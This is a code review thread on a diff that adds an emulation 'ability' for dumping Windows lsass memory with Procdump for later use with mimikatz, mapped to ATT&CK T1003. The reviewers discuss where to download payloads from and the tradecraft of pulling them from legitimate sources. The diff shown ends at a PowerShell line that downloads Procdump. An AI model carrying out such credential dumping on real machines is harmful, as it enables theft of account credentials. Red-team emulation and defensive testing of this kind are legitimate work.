data/abilities/credential-access/0ef4cc7b-611c-4237-b20b-db36b6906554.yml

```diff
@@ -0,0 +1,26 @@
+---
+
+- id: 0ef4cc7b-611c-4237-b20b-db36b6906554
+  name: Leverage Procdump for lsass memory
+  description: Dump lsass for later use with mimikatz
+  tactic: Credential Dumping
+  technique:
+    attack_id: T1003
+    name: Credential Dumping
+  platforms:
+    windows:
+      psh:
+        command: |
+            $ps_url = "https://download.sysinternals.com/files/Procdump.zip";
```

Comment:
we should handle this server side
also @unkempthenry recently added this ability

Reply:
As in we should host sysinternals in payloads or have a fact to specify the remote URL to download?

Reply:
hosting sysinternals is tricky b/c their license forbids redistribution.

Reply:
Alright, in that case I'll break the URL out into it's own fact.

Reply:
@wbooth from a "tradecraft" perspective, it's better to pull payloads from legitimate locations when possible.  Food for thought

Reply:
How would we like to proceed?

Reply:
let's merge this in as is and address the download options and channels separately.